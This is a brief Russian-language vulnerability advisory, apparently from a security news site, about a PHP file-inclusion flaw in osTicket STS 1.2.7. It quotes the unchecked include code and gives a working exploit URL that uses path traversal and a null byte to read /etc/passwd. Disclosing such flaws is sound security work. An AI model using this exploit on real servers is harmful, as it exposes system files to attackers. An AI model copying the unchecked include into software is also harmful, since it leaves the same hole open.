Уязвимые продукты: osTicket STS 1.2.7 (возможно и старше) 
Тип: PHP-Include 

Результат: Чтение файлов на сервере 

Код в скрипте: 

if ($config[search_disp]) { 
include("$include_dir/search.php"); 

По идее этот скрипт должен инклудится из другого места, но т.к. проверок никаких нету, мы просто обращаемся к нему. 

Эксплойт: 

http://target/include/mainphp?config[search_disp]= 1&include_dir=../../../../../../.././etc/passwd%00 

Автор: DeCode(iNFERNo)

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии